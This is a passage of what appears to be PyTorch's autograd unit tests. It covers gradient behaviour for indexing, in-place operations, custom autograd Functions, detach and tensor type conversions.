check_index(x, y, ([1, 2], [0, 1]))
check_index(x, y, ([1, 2], [0, 1], Ellipsis))
check_index(x, y, (Ellipsis, [1, 2], [0, 1]))
# advanced indexing, with a tensor wrapped in a variable
z = torch.LongTensor([0, 1])
zv = Variable(z, requires_grad=False)
seq = [z, Ellipsis]
seqv = [zv, Ellipsis]
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[seq]
indexed_var = y[seqv]
compare(x, y, seq, indexed_tensor, indexed_var)
def test_indexing_duplicates(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = torch.LongTensor([1, 1, 3, 2, 1, 2])
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx:
expected_grad[i] += 1
self.assertEqual(y.grad, expected_grad)
# with advanced indexing
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 3, 2, 1, 2], [0]]
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx[0]:
for j in idx[1]:
expected_grad[i][j] += 1
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[[1, 2], [0, 0]], [[0, 1], [1, 1]]]
y[idx].sum().backward()
expected_grad = torch.tensor([[0., 2., 0., 0.],
[1., 0., 0., 0.],
[0., 1., 0., 0.],
[0., 0., 0., 0.]])
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 65).view(4, 4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 1], slice(None), slice(None)]
y[idx].sum().backward()
expected_grad = torch.empty(4, 4, 4).zero_()
expected_grad[1].fill_(3)
self.assertEqual(y.grad, expected_grad)
def test_index_backward_does_not_save_tensor(self):
# Example from https://github.com/pytorch/pytorch/issues/24853.
# if `index(tensor, indices)` saves `tensor` for backward, then it will
# trigger a version check on `tensor` during the backward pass, which
# will cause the following code to error because `tensor` gets modified
# by the indexing line.
a = torch.tensor([1., 0, 0])
b = torch.zeros(3, requires_grad=True)
tensor = b + 0
tensor[a != 0] = tensor[a != 0]
tensor.backward(torch.zeros_like(tensor))
def test_volatile_deprecated(self):
v = torch.autograd.torch.randn(3, 3)
with warnings.catch_warnings(record=True) as w:
self.assertFalse(v.volatile)
self.assertIn('volatile', str(w[0].message))
def test_saved_variables_deprecated(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_variables
return (grad_output, grad_output)
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter("always")
x = torch.randn((3, 3), requires_grad=True)
y = torch.randn((3, 3), requires_grad=True)
MyFunction.apply(x, y).sum().backward()
has_deprecated = map(lambda warn:
'deprecated' in str(warn) and
'saved_variables' in str(warn),
warns)
has_deprecated = reduce(lambda x, y: x or y, has_deprecated)
self.assertTrue(has_deprecated)
def test_requires_grad(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
z = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertFalse(a.requires_grad)
b = a + z
self.assertTrue(b.requires_grad)
def error():
raise RuntimeError
# Make sure backward isn't called on these
a._backward_hooks = OrderedDict()
x._backward_hooks = OrderedDict()
y._backward_hooks = OrderedDict()
a._backward_hooks['test'] = error
x._backward_hooks['test'] = error
y._backward_hooks['test'] = error
b.backward(torch.ones(5, 5))
def test_requires_grad_(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
self.assertIs(x, x.requires_grad_())
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_())
self.assertTrue(y.requires_grad)
self.assertIs(x, x.requires_grad_(True))
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_(True))
self.assertTrue(y.requires_grad)
z = x * y
self.assertRaises(RuntimeError, lambda: z.requires_grad_(False))
self.assertIs(z, z.requires_grad_())
self.assertTrue(z.requires_grad)
self.assertIs(z, z.requires_grad_(True))
self.assertTrue(z.requires_grad)
self.assertIs(x, x.requires_grad_(False))
self.assertFalse(x.requires_grad)
self.assertIs(y, y.requires_grad_(False))
self.assertFalse(y.requires_grad)
def test_requires_grad_inplace(self):
a = torch.randn(5, 5)
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
# non-leaf
a = torch.randn(5, 5) + 0
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
def test_no_requires_grad_inplace(self):
# basic case, should be able to modify inplace while requires_grad is False
a = torch.randn(2, 3)
a.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# same but with a view
a = torch.randn(2, 3)
b = a[:]
b.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# should fail if we modify in-place after requires_grad is set to True
a = torch.randn(2, 3)
b = a[:]
a.requires_grad = True
with self.assertRaises(RuntimeError):
a.add_(5)
with self.assertRaises(RuntimeError):
b.add_(5)
def test_attribute_deletion(self):
x = torch.randn((5, 5), requires_grad=True)
del x.grad
self.assertIsNone(x.grad)
with self.assertRaises(RuntimeError):
del x.data
with self.assertRaises(TypeError):
x.data = None
with self.assertRaises(RuntimeError):
del x.requires_grad
with self.assertRaises(RuntimeError):
del x._grad_fn
with self.assertRaises(RuntimeError):
del x._backward_hooks
def test_duplicate_backward_root(self):
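# Passing the same tensor twice as a backward root should accumulate its
# gradient contribution twice (d(a*b)/da = b and d(a*b)/db = a).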
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
x = a * b
grad_output = torch.randn_like(x)
torch.autograd.backward([x, x], [grad_output, grad_output])
self.assertEqual(a.grad, b * grad_output * 2)
self.assertEqual(b.grad, a * grad_output * 2)
def test_backward_no_grad(self):
a = torch.randn(5, 5, requires_grad=True)
b = a + 2
with self.assertRaises(RuntimeError):
torch.autograd.backward([b], [None])
def test_backward_twice_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True',
lambda: c.backward(torch.tensor([1, 1, 1], dtype=torch.double)))
def test_backward_twice_retained_graph_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b + 1
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_retained_graph_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_create_graph_warns(self):
try:
prev = torch.is_warn_always_enabled()
torch.set_warn_always(True)
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b * b
with warnings.catch_warnings(record=True) as ws:
c.backward(torch.ones_like(c), create_graph=True)
b.grad = None
self.assertTrue(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
# Should not warn for grad
with warnings.catch_warnings(record=True) as ws:
torch.autograd.grad(c, b, torch.ones_like(c), create_graph=True)
self.assertFalse(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
finally:
torch.set_warn_always(prev)
def test_next_functions(self):
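# grad_fn.next_functions holds one (node, index) pair per input:
# AccumulateGrad nodes for the leaves of x + y, and a None node for the
# constant operand in a + 5.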
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertIsNotNone(a.grad_fn)
next_functions = a.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIsInstance(next_functions[0][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[0][1], 0)
self.assertIsInstance(next_functions[1][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[1][1], 0)
b = a + 5
next_functions = b.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIs(next_functions[0][0], a.grad_fn)
self.assertIs(next_functions[1][0], None)
def test_inplace(self):
x = torch.ones(5, 5, requires_grad=True)
y = Variable(torch.ones(5, 5) * 4, requires_grad=True)
z = x * y
q = z + y
w = z * y
z.add_(2)
# Add doesn't need its inputs to do backward, so it shouldn't raise
q.backward(torch.ones(5, 5), retain_graph=True)
# Mul saves both inputs in forward, so it should raise
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
z = x * y
q = z * y
r = z + y
w = z.add_(y)
# w is the result of the last in-place op on z, so this should succeed
w.backward(torch.ones(5, 5), retain_graph=True)
# r doesn't use the modified value in backward, so it should succeed
r.backward(torch.ones(5, 5), retain_graph=True)
# q uses dirty z, so it should raise
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
with torch.no_grad():
x.grad.zero_()
m = x / 2
z = m + y / 8
q = z * y
r = z + y
prev_version = z._version
w = z.exp_()
self.assertNotEqual(z._version, prev_version)
r.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.ones(5, 5) / 2)
w.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.empty(5, 5).fill_((1 + math.e) / 2))
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
leaf = torch.ones(5, 5, requires_grad=True)
x = leaf.clone()
x.add_(10)
self.assertEqual(x, torch.ones(5, 5) * 11)
# x should still be usable
y = x + 2
y.backward(torch.ones(5, 5))
self.assertEqual(leaf.grad, torch.ones(5, 5))
z = x * y
x.add_(2)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
def test_mark_non_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input > 0
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return (grad_output * 0).to(torch.double)
x = torch.randn(5, 5, requires_grad=True)
mask = MyFunction.apply(x)
self.assertFalse(mask.requires_grad)
y = x.masked_fill(mask, 0)
y.sum().backward()
def test_mark_non_differentiable_mixed(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
a = input + 1
b = input + 2
ctx.mark_non_differentiable(a)
return a, b
@staticmethod
def backward(ctx, grad_a, grad_b):
self.assertTrue((grad_a == 0).all())
self.assertTrue((grad_b == 1).all())
return grad_b
x = torch.randn(5, 5, requires_grad=True)
a, b = MyFunction.apply(x)
self.assertFalse(a.requires_grad)
self.assertTrue(b.requires_grad)
b.sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5))
def test_mark_non_differentiable_none(self):
# This used to segfault because MyFunction would send back null
# gradients to MulBackward, which is implemented in C++. C++-implemented
# functions expect incoming grad_outputs to be non-null.
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input.clone()
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return None
x = torch.randn(5, 5, requires_grad=True)
r = MyFunction.apply(x * x)
(r * x).sum().backward()
def test_return_duplicate(self):
class DoubleDuplicate(Function):
@staticmethod
def forward(ctx, x):
output = x * 2
return output, output
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def fn(x):
a, b = DoubleDuplicate.apply(x)
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(fn, [x])
gradgradcheck(fn, [x])
def test_return_duplicate_inplace(self):
class DoubleInplace(Function):
@staticmethod
def forward(ctx, x):
x.mul_(2)
ctx.mark_dirty(x)
return x, x
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def inplace_fn(x):
a, b = DoubleInplace.apply(x.clone())
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(inplace_fn, [x])
gradgradcheck(inplace_fn, [x])
# Can't modify leaf variables in-place
self.assertRaises(RuntimeError, lambda: DoubleInplace.apply(x))
# Functions which modify views in-place must return only one output
self.assertRaises(RuntimeError, lambda: DoubleInplace.apply(x.clone()[0]))
@suppress_warnings
def test_resize(self):
x = torch.ones(2, 3)
self.assertTrue(x.resize(3, 2).size() == (3, 2))
def _test_setitem(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
y[index] = 2
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad = torch.ones(*size)
expected_grad[index] = 0
self.assertEqual(x.grad, expected_grad)
def _test_setitem_tensor(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
value = x.new(x[index].size()).fill_(7)
value.requires_grad = True
y[index] = value
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad_input = torch.ones(*size)
expected_grad_input[index] = 0
self.assertEqual(x.grad, expected_grad_input)
self.assertEqual(value.grad, torch.ones_like(value))
# case where x is broadcast when assigned to y[1]
x = torch.randn(4, requires_grad=True)
y = torch.zeros(2, 3, 4)
y[1] = x
y.backward(torch.randn(2, 3, 4))
self.assertEqual(x.size(), x.grad.size())
def test_setitem(self):
self._test_setitem((5, 5), 1)
self._test_setitem((5,), 1)
self._test_setitem((1,), 0)
self._test_setitem((10,), [[0, 4, 2]])
self._test_setitem((5, 5), [[0, 4], [2, 2]])
self._test_setitem((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5), 3)
self._test_setitem_tensor((5, 5), [[0, 1], [1, 0]])
self._test_setitem_tensor((5,), 3)
self._test_setitem_tensor((5,), Variable(torch.LongTensor([3]), requires_grad=False).sum())
self._test_setitem_tensor((5,), [[0, 1, 2, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem_tensor((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem_tensor((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem_tensor((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5, 5), [Variable(torch.LongTensor([1,
3]), requires_grad=False), [2, 4], slice(None)])
def test_setitem_mask(self):
mask = torch.BoolTensor(5, 5).bernoulli_()
self._test_setitem((5, 5), Variable(mask))
self._test_setitem((5,), Variable(mask[0]))
self._test_setitem((1,), Variable(mask[0, 0:1]))
self._test_setitem_tensor((5, 5), Variable(mask))
self._test_setitem_tensor((5,), Variable(mask[0]))
def test_select_sum(self):
# both select and sum return Scalars in ATen; ensure they work together.
x = torch.randn(10, dtype=torch.double, requires_grad=True)
def func(x):
return x.select(0, 1).sum()
gradcheck(func, [x])
gradgradcheck(func, [x])
def test_diagonal_expanded_v(self):
value = torch.rand([])
v_expanded = torch.tensor(value).expand(10)
a = torch.rand(10, 10, dtype=torch.double, requires_grad=True)
result, = torch.autograd.grad(a.diagonal(), a, v_expanded)
self.assertEqual(result, torch.eye(10, dtype=torch.double) * value)
def test_select_expanded_v(self):
v_expanded = torch.rand(10).expand(10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[0], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[0] = v_expanded
self.assertEqual(result, expected)
def test_slice_expanded_v(self):
v_expanded = torch.rand(10, 1).expand(2, 10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[3:5], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[3:5] = v_expanded
self.assertEqual(result, expected)
# TODO: opinfo this or move to unbind's test suite
def test_unbind(self):
stacked = torch.randn(3, 10, 10, requires_grad=True)
x, y, z = stacked.unbind()
grad = torch.randn(3, 10, 10)
torch.autograd.backward([x, y, z], grad.unbind())
self.assertEqual(stacked.grad, grad)
# check that it works with only one gradient provided (#9977)
for i in range(3):
stacked = torch.randn(3, 10, 10, requires_grad=True)
outs = stacked.unbind()
gi = grad.unbind()[i]
g, = torch.autograd.grad(outs[i], stacked, gi)
g_expected = torch.stack([gi if j == i else torch.zeros_like(gi)
for j in range(3)], dim=0)
self.assertEqual(g, g_expected)
# TODO: opinfo this or move to fill's test suite
def test_fill(self):
root = torch.randn(4, 5, requires_grad=True)
def func(root):
x = root.clone()
x.fill_(2)
return x
gradcheck(func, [root])
gradgradcheck(func, [root])
def test_unused_output(self):
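# Only the chunk that feeds the loss should receive gradient (scaled by 4
# from o * 4 + 2); the slices for unused chunks stay zero.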
x = torch.randn(10, 10, requires_grad=True)
outputs = x.chunk(5)
o = outputs[2]
o = o * 4 + 2
o.sum().backward()
expected_grad = torch.zeros(10, 10)
expected_grad[4:6] = 4
self.assertEqual(x.grad, expected_grad)
with torch.no_grad():
x.grad.zero_()
grad_output = torch.randn(2, 10)
outputs = x.chunk(5)
outputs[0].backward(grad_output)
expected_grad = torch.zeros(10, 10)
expected_grad[:2] = grad_output
self.assertEqual(x.grad, expected_grad)
# TODO: opinfo this or move to the sparse test suite
def _test_sparse_gather(self, size_x, size_ind, dim):
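# The gradient computed with sparse_grad=True must match the dense-path
# gradient once converted back with to_dense().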
x = torch.randn(size_x, requires_grad=True)
if len(size_ind) > 0 and len(size_x) > 0:
ind = torch.randint(x.size(dim), size_ind)
else:
ind = torch.zeros(size_ind, dtype=torch.int64)
out = torch.gather(x, dim, ind, sparse_grad=False)
grad = torch.rand_like(out)
out.backward(grad)
grad_dense = x.grad.clone()
x.grad = None
out = torch.gather(x, dim, ind, sparse_grad=True)
out.backward(grad)
self.assertEqual(grad_dense, x.grad.to_dense())
def test_sparse_gather_dim0(self):
self._test_sparse_gather((10, 10), (5, 10), 0)
def test_sparse_gather_dim1(self):
self._test_sparse_gather((10, 10, 5), (10, 5, 5), 1)
def test_sparse_gather_dim_neg(self):
self._test_sparse_gather((10, 10, 5), (10, 10, 2), -1)
def test_sparse_gather_ind_scalar(self):
self._test_sparse_gather((10,), (), 0)
def test_sparse_gather_x_scalar(self):
self._test_sparse_gather((), (2,), 0)
def test_sparse_gather_both_scalar(self):
self._test_sparse_gather((), (), 0)
def test_gc_in_destructor(self):
"""
Previously, if a Function destructor triggered a garbage collection,
the Variable's tp_dealloc handler would get called twice, leading to a
segfault.
"""
class CollectOnDelete(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
def __del__(self):
gc.collect()
for _ in range(10):
CollectOnDelete().forward(torch.randn(1, requires_grad=True)).backward()
def test_naughty_autograd_function_attribute_access(self):
class Id(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad_x):
return grad_x
with self.assertWarnsRegex(DeprecationWarning, "should not be instantiated"):
f = Id()
# After raising the warning, it should still return an instance
self.assertIsInstance(f, Id)
x = torch.zeros(1, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "non-static forward method is deprecated"):
f(x)
t = Id.apply(x)
self.assertEqual(t.grad_fn.name(), "IdBackward")
# THPFunction is the base class of both grad_fn and autograd functions,
# which means that a lot of accessors on them may segfault. Test that we
# properly error in this case.
t = torch.ones(1, requires_grad=True)
t._backward_hooks = dict()
with self.assertRaisesRegex(RuntimeError, "Attribute '_register_hook_dict' is invalid"):
f._register_hook_dict(t)
with self.assertRaisesRegex(RuntimeError, "Attribute 'register_hook' is invalid"):
f.register_hook(lambda x, y: None)
with self.assertRaisesRegex(RuntimeError, "Attribute 'next_functions' is invalid"):
f.next_functions
with self.assertRaisesRegex(RuntimeError, "Attribute 'name' is invalid"):
f.name()
with self.assertRaisesRegex(RuntimeError, "underlying PyNode has already been deallocated"):
f.metadata
@unittest.expectedFailure
def test_naughty_anomaly_access(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, g):
return g
x = torch.zeros(1, requires_grad=True)
y = MyFunction.apply(x)
y.backward()
y.grad_fn.metadata
g = y.grad_fn
del y
g.metadata # this currently fails, but shouldn't
def test_naughty_autograd_function_stashing_ctx(self):
saved_ctx = []
class Id(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_ctx.append(ctx)
return ctx.saved_tensors
p = torch.zeros(1, requires_grad=True)
loss = Id.apply(p)
loss.backward(retain_graph=True)
del loss
# At this point in time, it complains that the graph has been freed
# (which is indeed true, although a somewhat indirect way of stating the
# problem).
self.assertRaises(RuntimeError, lambda: saved_ctx[0].saved_tensors)
def test_custom_autograd_repeated_grad_grad(self):
# This test failed the equality check in PR #22983; it's an interesting
# and different test case worth enshrining. mult1 is not testing
# anything particularly interesting, but mult2 is the interesting case.
def mult1(x):
return x.prod(dim=-1).prod(dim=-1)
class Mult(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = mult1(x)
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return (grad_output * y)[:, None, None] / x
mult2 = Mult.apply
def check_gradgrad_repeated(x, y):
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_1, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_2, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
self.assertEqual(ggy_1[0, 0, 1], ggy_2[0, 0, 1])
x = torch.ones(2, 4, 4).requires_grad_()
check_gradgrad_repeated(x, mult1(x))
check_gradgrad_repeated(x, mult2(x))
def test_custom_autograd_no_early_free(self):
# Prior to #22983, this test failed complaining that buffers had already
# been freed. Also a pretty interesting test case.
class Double(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = x ** 2
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, _ = ctx.saved_tensors
return grad_output * 2 * x
# this is equivalent, but uses the output of .forward() in .backward()
class Double2(Double):
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return grad_output * 2 * y / x
double = Double.apply
double2 = Double2.apply
x = torch.tensor(2).double().requires_grad_()
self.assertTrue(gradcheck(double, x))
self.assertTrue(gradgradcheck(double, x))
self.assertTrue(gradcheck(double2, x))
self.assertTrue(gradgradcheck(double2, x))
y = double(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x)
y = double2(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x) # should not error!
def test_detach(self):
x = torch.randn(10, 10, requires_grad=True)
y = x + 2
y = y.detach()
z = y * 4 + 2
self.assertFalse(y.requires_grad)
self.assertFalse(z.requires_grad)
x = torch.randn(10, 10, requires_grad=True)
y = x * 2
y = y.detach()
self.assertFalse(y.requires_grad)
self.assertIsNone(y.grad_fn)
z = x + y
z.sum().backward()
# This is an incorrect gradient, but we assume that's what the user
# wanted. detach() is an advanced option.
self.assertEqual(x.grad, torch.ones(10, 10))
# in-place detach
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
a = x * 2
(y + a).sum().backward(retain_graph=True)
a.detach_()
self.assertFalse(a.requires_grad)
(y + a).sum().backward() # this won't backprop to x
self.assertEqual(x.grad, torch.ones(10, 10) * 2)
self.assertEqual(y.grad, torch.ones(10, 10) * 2)
# in-place detach on a view raises an exception
view = x.narrow(0, 1, 4)
self.assertRaisesRegex(RuntimeError, 'view', lambda: view.detach_())
def test_detach_base(self):
"detaching base does not detach view"
x = torch.randn(10, 10, requires_grad=True)
view = x.narrow(0, 1, 4)
x.detach_()
self.assertFalse(x.requires_grad)
self.assertTrue(view.requires_grad)
self.assertIsNotNone(view.grad_fn)
self.assertIs(view._base, x)
def _test_type_conversion_backward(self, t, ):
fvar = Variable(t(torch.randn(5, 5).float()), requires_grad=True)
fvar.double().sum().backward()
self.assertEqual(fvar.grad, torch.ones_like(fvar))
self.assertEqual(type(fvar.grad), type(fvar))
dvar = Variable(t(torch.randn(5, 5).double()), requires_grad=True)
dvar.float().sum().backward()
self.assertEqual(dvar.grad, torch.ones_like(dvar))
self.assertEqual(type(dvar.grad), type(dvar))
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.int(), torch.IntTensor)
if torch.cuda.is_available():
self.assertIsInstance(x.float().cuda(), torch.cuda.FloatTensor)
self.assertIsInstance(x.int().cuda(), torch.cuda.IntTensor)
self.assertIsInstance(x.int().cuda().cpu(), torch.IntTensor)
if torch.cuda.device_count() >= 2:
x2 = x.float().cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
x2 = x.float().cuda()
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 0)
x2 = x2.cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
y = Variable(torch.randn(5).cuda(1), requires_grad=True)
y.cpu().sum().backward()
self.assertIs(y.grad.get_device(), 1)
self.assertIs(y.long().get_device(), 1)
for t in [torch.DoubleTensor, torch.FloatTensor, torch.IntTensor, torch.ByteTensor]:
for y_var in (True, False):
y = torch.randint(5, (5, 5), dtype=t.dtype)
y = Variable(y) if y_var else y
self.assertIsInstance(x.type(t), t)
self.assertIsInstance(x.type_as(y), t)
# TODO: t.dtype should work
t_dtype = t().dtype
self.assertIsInstance(x.type(t_dtype), t)
self.assertIs(t_dtype, x.type(t_dtype).dtype)
self.assertEqual(y.data_ptr(), y.type(t).data_ptr())
if torch.cuda.is_available():
for x_cuda in (True, False):
for y_cuda in (True, False):
x_c = x.cuda() if x_cuda else x
y_c = y.cuda() if y_cuda else y
_, y_type = y_c.type().rsplit('.', 1)
y_typestr = ('torch.cuda.' if y_cuda else 'torch.') + y_type
self.assertEqual(y_c.type(), x_c.type(y_typestr).type())
self.assertIs(y_c.dtype, x_c.type(y_c.dtype).dtype)
self.assertEqual(y_c.data_ptr(), y_c.cuda().data_ptr() if y_cuda else y_c.data_ptr())
self._test_type_conversion_backward(lambda x: x)
if torch.cuda.is_available():
self._test_type_conversion_backward(lambda x: x.cuda())
if torch.cuda.device_count() >= 2:
# one of these has to be the non-default device
self._test_type_conversion_backward(lambda x: x.cuda(0))
self._test_type_conversion_backward(lambda x: x.cuda(1))
def test_isolated_node(self):
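# b is derived from argmax indices (a non-differentiable path), so it is an
# isolated node; backward through (b + a).sum() should still succeed via a.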
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
b = torch.max(a, 1, True)[1].repeat(1, 5).double()
o = (b + a).sum()
o.backward()
def test_shape(self):
x = torch.randn(3, 4)
self.assertEqual(2, len(x.shape))
self.assertEqual(x.shape[0], 3)
self.assertEqual(x.shape[1], 4)
def test_numpy_requires_grad(self):
x = torch.randn(2, 2, requires_grad=True)
err_msg_outputs = r"Can't call numpy\(\) on Tensor that requires grad. Use tensor.detach\(\).numpy\(\) instead."
with self.assertRaisesRegex(RuntimeError, err_msg_outputs):
x.numpy()
with torch.no_grad():
x.numpy()
x = torch.randn(2, 2)
x.numpy()
with torch.no_grad():
x.numpy()
def test_return_leaf(self):
class Identity(Function):
@staticmethod
def forward(ctx, a, b):
return a, a + b
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a + grad_b, grad_b
hook_called = [False]
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q, p = Identity.apply(x, y)
# Make sure hooks only receive grad from usage of q, not x.
def hook(grad):
hook_called[0] = True
self.assertEqual(grad, torch.ones(5, 5))
q.register_hook(hook)
(q + p + x).sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5) * 3)
self.assertEqual(y.grad, torch.ones(5, 5))
self.assertTrue(hook_called[0])
def test_return_leaf_inplace(self):
class Inplace(InplaceFunction):
@staticmethod
def forward(ctx, a, b):
ctx.mark_dirty(a)
return a.add_(b), b + 2
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a, grad_a + grad_b
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
q, p = Inplace.apply(x, y)
self.assertIs(q, x)
self.assertIs(q.grad_fn.__class__, Inplace._backward_cls)
self.assertTrue(q.requires_grad)
q.sum().backward()
self.assertEqual(y.grad, torch.ones(5, 5))
def test_leaf_assignment(self):
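# Assigning tensors that require grad into a plain tensor should turn it into a
# non-leaf that requires grad, with gradients flowing back into y and z.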
x = torch.randn(5, 5)
y = torch.randn(5, requires_grad=True)
z = torch.randn(5, requires_grad=True)
x[0] = y
x[1] = 2 * z
self.assertTrue(x.requires_grad)
self.assertIsNot(x.grad_fn, None)
x.sum().backward()
self.assertEqual(y.grad, torch.ones(5))
self.assertEqual(z.grad, torch.ones(5) * 2)
def test_no_grad_assignment(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5)
with torch.no_grad():
x[0] = y
self.assertTrue(x.requires_grad)
self.assertIsNone(x.grad_fn)
def test_no_grad_modifies_version(self):
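# An in-place op performed under no_grad() still bumps the tensor's version
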